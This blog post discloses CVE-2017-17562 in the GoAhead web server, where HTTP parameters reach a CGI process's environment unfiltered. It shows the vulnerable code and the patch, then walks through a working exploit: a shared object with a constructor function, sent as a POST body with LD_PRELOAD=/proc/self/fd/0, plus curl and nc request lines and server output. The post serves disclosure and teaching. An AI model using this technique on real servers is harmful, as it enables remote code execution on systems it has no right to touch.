Remote LD_PRELOAD Exploitation
GoAhead: Make My Day
This blog post details CVE-2017-17562, a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5.
The vulnerability is a result of initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and affects all users who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as LD_PRELOAD (commonly used to perform function hooking, see preeny).
For those unfamiliar with GoAhead, its marketing page says that it’s “the world’s most popular, tiny embedded web server” and is used by such companies as IBM, HP, Oracle, Boeing, D-Link, and Motorola. We did a search on Shodan [1], and found over 735,000 devices using it on the internet today.
[1] Update 28/12: It’s important to note that this number only reflects the servers that responded to Shodan requests with a “Server: GoAhead” header. It does not reflect the actual subset of devices affected by this issue, which is limited to servers that run *nix, have CGI enabled, and use dynamically linked CGI executables.
The exploitation of this issue serves as an interesting case study, and could be applied to other types of software with the same insecure construct.
This vulnerability has existed in all versions of the GoAhead source since at least 2.5.0 (we could not find earlier versions to test against) with the optional CGI support enabled. You can follow along by cloning and compiling the repository as follows:
The vulnerability resides in the cgiHandler function, which starts by allocating an array of pointers for the envp argument of the new process, then initialises it with the key-value pairs taken from HTTP request parameters. Finally, the launchCgi function is called, which forks and execves the CGI script.
Apart from REMOTE_HOST and HTTP_AUTHORIZATION, which are filtered out, all other parameters are considered trusted and passed along unfiltered. This gives an attacker control over arbitrary environment variables for the new CGI process. This is quite dangerous, as you will see later in the exploitation section.
...
PUBLIC bool cgiHandler(Webs *wp)
{
    Cgi *cgip;
    WebsKey *s;
    char cgiPrefix[ME_GOAHEAD_LIMIT_FILENAME], *stdIn, *stdOut, cwd[ME_GOAHEAD_LIMIT_FILENAME];
    char *cp, *cgiName, *cgiPath, **argp, **envp, **ep, *tok, *query, *dir, *extraPath, *exe;
    CgiPid pHandle;
    int n, envpsize, argpsize, cid;
    ...
    /*
        Add all CGI variables to the environment strings to be passed to the spawned CGI process. This includes a few
        we don't already have in the symbol table, plus all those that are in the vars symbol table. envp will point
        to a walloc'd array of pointers. Each pointer will point to a walloc'd string containing the keyword value pair
        in the form keyword=value. Since we don't know ahead of time how many environment strings there will be the for
        loop includes logic to grow the array size via wrealloc.
     */
    envpsize = 64;
    envp = walloc(envpsize * sizeof(char*));
    for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {
        if (s->content.valid && s->content.type == string &&
            strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&
            strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {
            envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);
            trace(5, "Env[%d] %s", n, envp[n-1]);
            if (n >= envpsize) {
                envpsize *= 2;
                envp = wrealloc(envp, envpsize * sizeof(char *));
            }
        }
    }
    *(envp+n) = NULL;
    /*
        Create temporary file name(s) for the child's stdin and stdout. For POST data the stdin temp file (and name)
        should already exist.
     */
    if (wp->cgiStdin == NULL) {
        wp->cgiStdin = websGetCgiCommName();
    }
    stdIn = wp->cgiStdin;
    stdOut = websGetCgiCommName();
    if (wp->cgifd >= 0) {
        close(wp->cgifd);
        wp->cgifd = -1;
    }
    /*
        Now launch the process. If not successful, do the cleanup of resources. If successful, the cleanup will be
        done after the process completes.
     */
    if ((pHandle = launchCgi(cgiPath, argp, envp, stdIn, stdOut)) == (CgiPid) -1) {
    ...
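To make the effect of that loop concrete, here is a minimal standalone sketch of the same filtering logic. It is not GoAhead code: struct param and build_envp_unfiltered are hypothetical names standing in for the wp->vars table and the loop in cgiHandler, and plain malloc replaces walloc and sfmt.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for one entry of GoAhead's wp->vars table. */
struct param {
    const char *name;
    const char *value;
};

/*
 * Build a NULL-terminated envp array the way the unpatched loop does:
 * only REMOTE_HOST and HTTP_AUTHORIZATION are skipped, every other
 * request parameter is copied through as "name=value".
 * The caller owns the array and each string in it.
 */
char **build_envp_unfiltered(const struct param *params, size_t count)
{
    char **envp = calloc(count + 1, sizeof(char *));
    size_t n = 0;

    if (envp == NULL)
        return NULL;
    for (size_t i = 0; i < count; i++) {
        if (strcmp(params[i].name, "REMOTE_HOST") == 0 ||
            strcmp(params[i].name, "HTTP_AUTHORIZATION") == 0)
            continue;
        size_t len = strlen(params[i].name) + strlen(params[i].value) + 2;
        envp[n] = malloc(len);
        if (envp[n] == NULL)
            break;
        /* Nothing stops the name from being LD_PRELOAD. */
        snprintf(envp[n], len, "%s=%s", params[i].name, params[i].value);
        n++;
    }
    envp[n] = NULL;
    return envp;
}
```

Feeding this a parameter named LD_PRELOAD yields an envp entry of exactly that name, which is what the child process will later see in its environment.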
This issue was fixed by skipping special parameter names, and prefixing all others with a static string. This appears to remediate the issue even against parameters of the form a=b%00LD_PRELOAD%3D - but please let me know if you find otherwise, I’d love to hear about it!
diff --git a/src/cgi.c b/src/cgi.c
index 899ec97b..18d9b45b 100644
--- a/src/cgi.c
+++ b/src/cgi.c
@@ -160,10 +160,17 @@ PUBLIC bool cgiHandler(Webs *wp)
     envpsize = 64;
     envp = walloc(envpsize * sizeof(char*));
     for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {
-        if (s->content.valid && s->content.type == string &&
-            strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&
-            strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {
-            envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);
+        if (s->content.valid && s->content.type == string) {
+            if (smatch(s->name.value.string, "REMOTE_HOST") ||
+                smatch(s->name.value.string, "HTTP_AUTHORIZATION") ||
+                smatch(s->name.value.string, "IFS") ||
+                smatch(s->name.value.string, "CDPATH") ||
+                smatch(s->name.value.string, "PATH") ||
+                sstarts(s->name.value.string, "LD_")) {
+                continue;
+            }
+            envp[n++] = sfmt("%s%s=%s", ME_GOAHEAD_CGI_PREFIX,
+                s->name.value.string, s->content.value.string);
             trace(5, "Env[%d] %s", n, envp[n-1]);
             if (n >= envpsize) {
                 envpsize *= 2;
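The two layers of the fix (a deny list plus a static prefix) can be sketched in isolation as follows. This is an illustration rather than the shipped code: is_blocked_name and format_env_entry are hypothetical helpers, the "CGI_" value of the prefix is an assumption (the patch only shows the macro name ME_GOAHEAD_CGI_PREFIX), and smatch and sstarts are assumed to be an equality test and a prefix test, as their use in the diff suggests.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed value; the patch only shows the macro name ME_GOAHEAD_CGI_PREFIX. */
#define CGI_PREFIX "CGI_"

/* True if the parameter name is one the patched loop refuses to export. */
bool is_blocked_name(const char *name)
{
    static const char *exact[] = {
        "REMOTE_HOST", "HTTP_AUTHORIZATION", "IFS", "CDPATH", "PATH"
    };
    for (size_t i = 0; i < sizeof(exact) / sizeof(exact[0]); i++) {
        if (strcmp(name, exact[i]) == 0)
            return true;
    }
    /* Anything starting with LD_ is dropped outright. */
    return strncmp(name, "LD_", 3) == 0;
}

/*
 * Format one environment entry into out as PREFIX + name + "=" + value.
 * Returns false if the name is blocked or the entry does not fit.
 */
bool format_env_entry(char *out, size_t outlen, const char *name, const char *value)
{
    if (is_blocked_name(name))
        return false;
    int written = snprintf(out, outlen, "%s%s=%s", CGI_PREFIX, name, value);
    return written >= 0 && (size_t)written < outlen;
}
```

The prefix is the more robust half of the fix: even a name that slips past the deny list reaches the child with the prefix in front of it, so the dynamic linker no longer recognises it as one of its own variables.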
Although the ability to inject arbitrary environment variables into a new process may seem relatively benign, there are cases where “special” environment variables can lead to alternative control flows for the dynamic linker.
Reading the ELF header of the goahead binary, we can see that it’s a 64-bit dynamically-linked executable. The program interpreter is specified in the INTERP program header and points to /lib64/ld-linux-x86-64.so.2 (this is the dynamic linker).
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -hl ./goahead
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0xf80
Start of program headers: 64 (bytes into file)
Start of section headers: 21904 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 9
Size of section headers: 64 (bytes)
Number of section headers: 34
Section header string table index: 33
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000001f8 0x00000000000001f8 R E 0x8
INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
...
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
The dynamic linker is the first code that runs in a dynamically linked executable, and is responsible for linking and loading shared objects and resolving symbols. To get a list of all the shared objects the goahead binary loads, we can set a special environment variable LD_TRACE_LOADED_OBJECTS to 1, which prints the loaded libraries and then exits.
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ LD_TRACE_LOADED_OBJECTS=1 ./goahead
linux-vdso.so.1 => (0x00007fff31bb4000)
libgo.so => /home/daniel/goahead/build/linux-x64-default/bin/libgo.so (0x00007f571f548000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f571f168000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f571ef49000)
/lib64/ld-linux-x86-64.so.2 (0x00007f571f806000)
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
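A process can also ask the dynamic linker for the same list from the inside. The sketch below assumes glibc on Linux and uses dl_iterate_phdr, a GNU extension declared in <link.h>; print_object and list_loaded_objects are names made up for this example.

```c
#define _GNU_SOURCE
#include <link.h>
#include <stdio.h>

/* Callback invoked once per loaded object; data points to a counter. */
static int print_object(struct dl_phdr_info *info, size_t size, void *data)
{
    int *count = data;
    (void)size;
    /* The main program is reported with an empty name. */
    printf("%s (base 0x%lx)\n",
           info->dlpi_name[0] ? info->dlpi_name : "[main program]",
           (unsigned long)info->dlpi_addr);
    (*count)++;
    return 0;   /* a non-zero return would stop the iteration */
}

/* Print every object mapped into this process and return how many there are. */
int list_loaded_objects(void)
{
    int count = 0;
    dl_iterate_phdr(print_object, &count);
    return count;
}
```

Calling list_loaded_objects() from a program started with LD_PRELOAD set should show the preloaded object in the list alongside the libraries named in DT_NEEDED entries.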
We can also find this information statically (without running the dynamic linker), by recursively grepping for the DT_NEEDED entries defined in each of the ELF shared objects:
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d ./goahead | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [libgo.so]
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /home/daniel/goahead/build/linux-x64-default/bin/libgo.so | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [libpthread.so.0]
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /lib/x86_64-linux-gnu/libc.so.6 | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [ld-linux-x86-64.so.2]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
Note: The astute reader may have noticed that linux-vdso.so.1 is missing from these DT_NEEDED entries. That’s correct: the vDSO is a special shared library mapped into user-space processes by the kernel. See man 7 vdso.
So that’s good and all, but what does any of this have to do with injecting environment variables? Well … we know the dynamic linker is the first code to execute for a new process - and if we read man 8 ld.so we discover there are special environment variables which modify default behavior.
As I’m a fan of looking at the source, let us take a journey into what’s happening. The dl_main function is essentially the main entry point of the dynamic linker.
static void
dl_main (const ElfW(Phdr) *phdr,
         ElfW(Word) phnum,
         ElfW(Addr) *user_entry,
         ElfW(auxv_t) *auxv)
{
  const ElfW(Phdr) *ph;
  enum mode mode;
  struct link_map *main_map;
  size_t file_size;
  char *file;
  bool has_interp = false;
  unsigned int i;
  ...
  /* Process the environment variable which control the behaviour. */
  process_envvars (&mode);
One of the first things this function does is call process_envvars.
static void
process_envvars (enum mode *modep)
{
  char **runp = _environ;
  char *envline;
  enum mode mode = normal;
  char *debug_output = NULL;
  /* This is the default place for profiling data file. */
  GLRO(dl_profile_output)
    = &"/var/tmp\0/var/profile"[__libc_enable_secure ? 9 : 0];
  while ((envline = _dl_next_ld_env_entry (&runp)) != NULL)
    {
      size_t len = 0;
      while (envline[len] != '\0' && envline[len] != '=')
        ++len;
      if (envline[len] != '=')
        /* This is a "LD_" variable at the end of the string without
           a '=' character. Ignore it since otherwise we will access
           invalid memory below. */
        continue;
      switch (len)
        {
        case 4:
          /* Warning level, verbose or not. */
          if (memcmp (envline, "WARN", 4) == 0)
            GLRO(dl_verbose) = envline[5] != '\0';
          break;
        case 5:
          /* Debugging of the dynamic linker? */
          if (memcmp (envline, "DEBUG", 5) == 0)
            {
              process_dl_debug (&envline[6]);
              break;
            }
          if (memcmp (envline, "AUDIT", 5) == 0)
            audit_list_string = &envline[6];
          break;
        case 7:
          /* Print information about versions. */
          if (memcmp (envline, "VERBOSE", 7) == 0)
            {
              version_info = envline[8] != '\0';
              break;
            }
          /* List of objects to be preloaded. */
          if (memcmp (envline, "PRELOAD", 7) == 0)
            {
              preloadlist = &envline[8];
              break;
            }
We see that the linker is parsing the envp array and exercising different code paths if special variable names are found. What is particularly interesting is case 7’s processing of LD_PRELOAD, where preloadlist is initialised.
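The lookup can be reduced to a few lines. The following is a simplified sketch, not glibc code: find_preload is a hypothetical function that folds the "keep only LD_ entries" step and the length-based name match into one loop. As the offsets in the glibc source imply (envline[8] is the first character after "PRELOAD="), the "LD_" prefix has already been stripped by the time the name is compared.

```c
#include <stddef.h>
#include <string.h>

/*
 * Return the value of LD_PRELOAD from a NULL-terminated envp array, or NULL
 * if it is absent. First keep only "LD_" entries, then match the name that
 * follows the prefix by its length, as the switch in process_envvars does.
 */
const char *find_preload(char *const envp[])
{
    for (size_t i = 0; envp[i] != NULL; i++) {
        const char *line = envp[i];
        if (strncmp(line, "LD_", 3) != 0)
            continue;
        line += 3;              /* skip the "LD_" prefix */

        size_t len = strcspn(line, "=");
        if (line[len] != '=')
            continue;           /* no '=' present: ignore the entry */
        if (len == 7 && memcmp(line, "PRELOAD", 7) == 0)
            return line + 8;    /* value starts after "PRELOAD=" */
    }
    return NULL;
}
```

Because the match is on the exact name length, an entry such as LD_PRELOADX=... is not mistaken for LD_PRELOAD.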
  ...
  /* We have two ways to specify objects to preload: via environment
     variable and via the file /etc/ld.so.preload. The latter can also
     be used when security is enabled. */
  assert (*first_preload == NULL);
  struct link_map **preloads = NULL;
  unsigned int npreloads = 0;
  if (__glibc_unlikely (preloadlist != NULL))
    {
      HP_TIMING_NOW (start);
      npreloads += handle_ld_preload (preloadlist, main_map);
      HP_TIMING_NOW (stop);
      HP_TIMING_DIFF (diff, start, stop);
      HP_TIMING_ACCUM_NT (load_time, diff);
    }
  ...
Further down in dl_main, if preloadlist is not NULL then the handle_ld_preload function is called.
/* The list preloaded objects. */
static const char *preloadlist attribute_relro;
/* Nonzero if information about versions has to be printed. */
static int version_info attribute_relro;
/* The LD_PRELOAD environment variable gives list of libraries
   separated by white space or colons that are loaded before the
   executable's dependencies and prepended to the global scope list.
   (If the binary is running setuid all elements containing a '/' are
   ignored since it is insecure.) Return the number of preloads
   performed. */
unsigned int
handle_ld_preload (const char *preloadlist, struct link_map *main_map)
{
  unsigned int npreloads = 0;
  const char *p = preloadlist;
  char fname[SECURE_PATH_LIMIT];
  while (*p != '\0')
    {
      /* Split preload list at space/colon. */
      size_t len = strcspn (p, " :");
      if (len > 0 && len < sizeof (fname))
        {
          memcpy (fname, p, len);
          fname[len] = '\0';
        }
      else
        fname[0] = '\0';
      /* Skip over the substring and the following delimiter. */
      p += len;
      if (*p != '\0')
        ++p;
      if (dso_name_valid_for_suid (fname))
        npreloads += do_preload (fname, main_map, "LD_PRELOAD");
    }
  return npreloads;
}
...
The handle_ld_preload function will parse the preloadlist and treat its value as a list of shared objects to be loaded!
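The splitting step is easy to try in isolation. This sketch keeps the same strcspn-based tokenising but only prints each name instead of loading it; split_preload_list and PRELOAD_NAME_LIMIT are hypothetical names (the latter standing in for SECURE_PATH_LIMIT), and the setuid validity check is left out.

```c
#include <stdio.h>
#include <string.h>

#define PRELOAD_NAME_LIMIT 256   /* hypothetical stand-in for SECURE_PATH_LIMIT */

/*
 * Split a preload list on spaces and colons, printing each entry.
 * Returns the number of non-empty entries that fit in the name buffer.
 */
unsigned int split_preload_list(const char *list)
{
    unsigned int count = 0;
    const char *p = list;
    char fname[PRELOAD_NAME_LIMIT];

    while (*p != '\0') {
        /* Length of the next token, up to a space, colon or end of string. */
        size_t len = strcspn(p, " :");
        if (len > 0 && len < sizeof(fname)) {
            memcpy(fname, p, len);
            fname[len] = '\0';
            printf("would load: %s\n", fname);
            count++;
        }
        /* Skip over the token and the delimiter that follows it. */
        p += len;
        if (*p != '\0')
            p++;
    }
    return count;
}
```

A single path such as /proc/self/fd/0 contains neither delimiter, so it is passed through as one entry.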
Putting this all together: because goahead lets us inject arbitrary environment variables, we can abuse glibc’s special handling of variables such as LD_PRELOAD to load arbitrary shared objects that aren’t even listed in the binary!
So, that’s cool and all - we can force arbitrary shared objects to be loaded. But how does this allow us to run code?
Enter the .init and .fini sections. If we mark a function with the constructor attribute, we can force that function to be called even before main.
#include <unistd.h>
static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
    write(1, "Hello: World!\n", 14);
}
daniel@makemyday:~/goahead/PoC$ gcc -shared -fPIC ./payload.c -o payload.so
daniel@makemyday:~/goahead/PoC$ LD_PRELOAD=./payload.so cat /dev/null
Hello: World!
daniel@makemyday:~/goahead/PoC$
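The .fini side works the same way through the destructor attribute. The sketch below is an assumption-labelled variation on the payload above, using GCC/Clang function attributes: constructor_ran, on_load and on_unload are names invented here, and the flag exists only so that later code can confirm the constructor really ran first.

```c
#include <unistd.h>

/* Set by the constructor so later code can confirm it ran before main. */
int constructor_ran = 0;

/* Runs when the object is loaded, before main is entered. */
__attribute__((constructor))
static void on_load(void)
{
    static const char msg[] = "loaded\n";
    constructor_ran = 1;
    ssize_t r = write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    (void)r;   /* the result is deliberately ignored in this sketch */
}

/* Runs when the object is unloaded or the process exits normally. */
__attribute__((destructor))
static void on_unload(void)
{
    static const char msg[] = "unloading\n";
    ssize_t r = write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    (void)r;
}
```

Built with the same gcc -shared -fPIC invocation as payload.c, the constructor message should appear before the host program's own output and the destructor message after it.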
Sweet! What does this look like if we try this out against GoAhead on our test system?
daniel@makemyday:~/goahead/PoC$ ls -la ./payload.so
-rwxrwxr-x 1 daniel daniel 7896 Dec 13 17:38 ./payload.so
daniel@makemyday:~/goahead/PoC$ echo -en "GET /cgi-bin/cgitest?LD_PRELOAD=$(pwd)/payload.so HTTP/1.0\r\n\r\n" | nc localhost 80 | head -10
HTTP/1.0 200 OK
Date: Wed Dec 13 02:38:56 2017
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello: World!
content-type: text/html
daniel@makemyday:~/goahead/PoC$
We can clearly see that our shared object’s code was executed by the cgitest process via LD_PRELOAD.
There is still one critical piece of the puzzle that we are missing. Even though we know it’s possible to load arbitrary shared objects from disk, and constructors will allow for code execution - how do we actually inject a malicious shared object into the remote server? After all, if we can’t do that then it’s really unlikely a legitimate shared object on disk will help us.
Fortunately, the launchCgi function will actually dup2() the stdin file descriptor, which points to a temporary file containing the body of the POST request. This means there will be a file on disk containing user-supplied data, which could be referenced with something like LD_PRELOAD=/tmp/cgi-XXXXXX.
/*
    Launch the CGI process and return a handle to it.
 */
static CgiPid launchCgi(char *cgiPath, char **argp, char **envp, char *stdIn, char *stdOut)
{
    int fdin, fdout, pid;
    trace(5, "cgi: run %s", cgiPath);
    if ((fdin = open(stdIn, O_RDWR | O_CREAT | O_BINARY, 0666)) < 0) {
        error("Cannot open CGI stdin: ", cgiPath);
        return -1;
    }
    if ((fdout = open(stdOut, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, 0666)) < 0) {
        error("Cannot open CGI stdout: ", cgiPath);
        return -1;
    }
    pid = vfork();
    if (pid == 0) {
        /*
            Child
         */
        if (dup2(fdin, 0) < 0) {
            printf("content-type: text/html\n\nDup of stdin failed\n");
            _exit(1);
        } else if (dup2(fdout, 1) < 0) {
            printf("content-type: text/html\n\nDup of stdout failed\n");
            _exit(1);
        } else if (execve(cgiPath, argp, envp) == -1) {
            printf("content-type: text/html\n\nExecution of cgi process failed\n");
        }
        ...
}
Still, having to remotely guess the temporary filename containing our POST payload is kind of annoying (but not impossible). Fortunately, the Linux procfs filesystem has a nice symbolic link that we can use to reference the stdin descriptor, which points to our temporary file. This can be leveraged by pointing LD_PRELOAD to /proc/self/fd/0. The same file can also be reached via /dev/stdin.
static const char *proc_self_get_link(struct dentry *dentry,
                                      struct inode *inode,
                                      struct delayed_call *done)
{
    struct pid_namespace *ns = inode->i_sb->s_fs_info;
    pid_t tgid = task_tgid_nr_ns(current, ns);
    char *name;
    if (!tgid)
        return ERR_PTR(-ENOENT);
    /* 11 for max length of signed int in decimal + NULL term */
    name = kmalloc(12, dentry ? GFP_KERNEL : GFP_ATOMIC);
    if (unlikely(!name))
        return dentry ? ERR_PTR(-ENOMEM) : ERR_PTR(-ECHILD);
    sprintf(name, "%d", tgid);
    set_delayed_call(done, kfree_link, name);
    return name;
}
static const struct inode_operations proc_self_inode_operations = {
    .get_link = proc_self_get_link,
};
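From user space, the same indirection can be observed by reading the symlink for an open descriptor. This is a small Linux-only sketch that assumes procfs is mounted at /proc; fd_to_path is a hypothetical helper, not part of GoAhead or glibc.

```c
#include <stdio.h>
#include <unistd.h>

/*
 * Resolve the path behind an open descriptor by reading the
 * /proc/self/fd/<fd> symlink. Returns 0 on success, -1 on failure.
 * Linux-specific: requires procfs mounted at /proc.
 */
int fd_to_path(int fd, char *buf, size_t buflen)
{
    char link[64];
    ssize_t n;

    if (buflen == 0)
        return -1;
    snprintf(link, sizeof(link), "/proc/self/fd/%d", fd);
    n = readlink(link, buf, buflen - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';   /* readlink does not NUL-terminate its result */
    return 0;
}
```

Inside a CGI child launched as described above, fd_to_path(0, ...) would be expected to return the name of the temporary file holding the request body, which is why the attacker never needs to guess that name.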
If we put all this information together, we can reliably exploit the vulnerability by sending a POST request containing a malicious shared object with a constructor that is called when the object is loaded. We also specify an HTTP parameter, ?LD_PRELOAD=/proc/self/fd/0, which will point to the temporary file on disk containing the attacker’s payload. At this point it’s game over.
daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 9931 0 2035 100 7896 2035 7896 0:00:01 0:00:01 --:--:-- 9774
HTTP/1.1 200 OK
Date: Sun Dec 17 13:08:20 2017
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello: World!
Content-type: text/html
daniel@makemyday:~/goahead/PoC$
If you would like a ready-to-go exploit please check out our advisory repo on GitHub.
This vulnerability was an interesting case study in how to remotely exploit LD_PRELOAD, and the exploit worked against every version of the GoAhead web server that we compiled with CGI support enabled. The construct itself may exist in other services, and it would be interesting to investigate. It may even be possible to use the exploit string blind, without auditing any code.
Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It’s possible there are other interesting vulnerabilities - and for those interested I’d recommend starting with a grep for websDefineHandler entry points.
If you’re interested in learning more about linking and loading, there’s a great article here and here that we suggest you check out.
Thanks for reading!